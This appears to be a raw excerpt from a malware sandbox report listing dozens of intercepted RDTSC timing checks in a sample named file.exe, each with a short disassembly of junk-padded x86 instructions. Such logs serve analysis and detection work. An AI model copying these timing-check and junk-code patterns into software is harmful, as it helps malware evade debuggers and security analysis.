Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779801 second address: 779807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779807 second address: 779813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779813 second address: 77982D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BE0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77982D second address: 779833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D613 second address: 77D617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D617 second address: 77D62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98EFDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DAB5 second address: 77DAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F60A4BE8BE6h 0x0000000b jc 00007F60A4BE8BD6h 0x00000011 jmp 00007F60A4BE8BE1h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DAE9 second address: 77DB08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F07h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DB08 second address: 77DB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DC4E second address: 77DC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F07h 0x00000009 pop esi 0x0000000a jnp 00007F60A4E98EFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DC72 second address: 77DC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DC7A second address: 77DC92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77E0BA second address: 77E0CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jo 00007F60A4BE8BD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78AF3F second address: 78AF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F60A4E98EFFh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78AF5B second address: 78AF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78AF68 second address: 78AF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B3A5 second address: 78B3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BDAh 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F60A4BE8BD6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B645 second address: 78B664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F60A4E98F07h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B934 second address: 78B93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B93F second address: 78B95B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F06h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BC16 second address: 78BC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BC1A second address: 78BC35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C47F second address: 78C4A6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F60A4BE8BE8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C4A6 second address: 78C4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C4AC second address: 78C4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F60A4BE8BDEh 0x0000000b push eax 0x0000000c pop eax 0x0000000d jnp 00007F60A4BE8BD6h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F60A4BE8BD6h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CBA7 second address: 78CBAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CBAB second address: 78CBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CBB4 second address: 78CBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F60A4E98EFCh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CBD5 second address: 78CBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F60A4BE8BD6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CBE2 second address: 78CBEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7924C9 second address: 7924DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7924DF second address: 7924E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79268C second address: 792691 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79280C second address: 79283E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F60A4E98EF6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F60A4E98F0Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F60A4E98EF6h 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A783F second address: 7A7845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A7845 second address: 7A7887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60A4E98EFEh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 push ecx 0x00000017 jmp 00007F60A4E98EFBh 0x0000001c jmp 00007F60A4E98F02h 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE6F5 second address: 7BE701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE840 second address: 7BE845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE845 second address: 7BE850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE850 second address: 7BE854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BEC63 second address: 7BEC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BEF26 second address: 7BEF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007F60A4E98F27h 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F60A4E98EF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1521 second address: 7C1527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C4D29 second address: 7C4D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F01h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2FCF second address: 7E2FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2FD3 second address: 7E2FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2FD7 second address: 7E2FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2FE3 second address: 7E2FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 800121 second address: 800127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FF3CB second address: 7FF3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F06h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FF3E5 second address: 7FF3FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F60A4BE8BE1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FF3FF second address: 7FF415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F60A4E98EFEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FF696 second address: 7FF6B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F60A4BE8BE3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FF6B3 second address: 7FF6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FFA70 second address: 7FFA9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDDh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F60A4BE8BE5h 0x00000011 jmp 00007F60A4BE8BDDh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FFA9C second address: 7FFAA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FFAA2 second address: 7FFAA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802DAC second address: 802DB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F60A4E98EF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802DB7 second address: 802E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F60A4BE8BE4h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F60A4BE8BD8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 add edx, dword ptr [ebp+122D23D5h] 0x0000002e push 00000004h 0x00000030 movsx edx, bx 0x00000033 call 00007F60A4BE8BD9h 0x00000038 jnp 00007F60A4BE8BE4h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802E14 second address: 802E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 718C1D second address: 718C27 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 718C27 second address: 718C41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4E98F06h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49902AD second address: 49902BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49902BC second address: 49902E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F60A4E98F05h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, esi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49902E2 second address: 499030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F60A4BE8BDDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 499030B second address: 4990356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov bh, 72h 0x0000000f popad 0x00000010 pushfd 0x00000011 jmp 00007F60A4E98F02h 0x00000016 xor esi, 210E61D8h 0x0000001c jmp 00007F60A4E98EFBh 0x00000021 popfd 0x00000022 popad 0x00000023 mov edx, dword ptr [ebp+0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990356 second address: 499035C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0016 second address: 49C0055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F06h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F60A4E98EFBh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F60A4E98F05h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0055 second address: 49C009E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F60A4BE8BDCh 0x00000012 and al, FFFFFF88h 0x00000015 jmp 00007F60A4BE8BDBh 0x0000001a popfd 0x0000001b push ecx 0x0000001c mov esi, ebx 0x0000001e pop edx 0x0000001f popad 0x00000020 xchg eax, ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F60A4BE8BDDh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C009E second address: 49C00BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C00BA second address: 49C00D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C00D4 second address: 49C00DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C00DA second address: 49C00DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C00DE second address: 49C00EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C00EC second address: 49C0111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F60A4BE8BE0h 0x0000000a adc ch, FFFFFFD8h 0x0000000d jmp 00007F60A4BE8BDBh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0111 second address: 49C017B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F60A4E98EFFh 0x00000009 adc ax, 709Eh 0x0000000e jmp 00007F60A4E98F09h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007F60A4E98F06h 0x0000001f push ecx 0x00000020 pop edx 0x00000021 popad 0x00000022 mov ax, 939Dh 0x00000026 popad 0x00000027 mov dword ptr [esp], esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F60A4E98EFFh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C017B second address: 49C0181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0181 second address: 49C01F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b jmp 00007F60A4E98F07h 0x00000010 nop 0x00000011 pushad 0x00000012 mov di, ax 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d pop ebx 0x0000001e call 00007F60A4E98EFEh 0x00000023 pop esi 0x00000024 popad 0x00000025 popad 0x00000026 nop 0x00000027 pushad 0x00000028 mov si, di 0x0000002b mov di, 0B7Eh 0x0000002f popad 0x00000030 push dword ptr [ebp+08h] 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F60A4E98EFEh 0x0000003c sub cl, 00000048h 0x0000003f jmp 00007F60A4E98EFBh 0x00000044 popfd 0x00000045 mov cx, D2BFh 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0253 second address: 49C027B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C027B second address: 49C0280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0280 second address: 49C02B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F60A4BE8BE0h 0x00000010 je 00007F60A4BE8C3Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov si, bx 0x0000001c mov eax, edx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0335 second address: 49C037F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F60A4E98F08h 0x00000008 sbb cl, FFFFFFA8h 0x0000000b jmp 00007F60A4E98EFBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov cx, AB9Fh 0x00000017 popad 0x00000018 pop esi 0x00000019 jmp 00007F60A4E98F02h 0x0000001e leave 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 mov edx, ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0080 second address: 49B0084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0084 second address: 49B008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
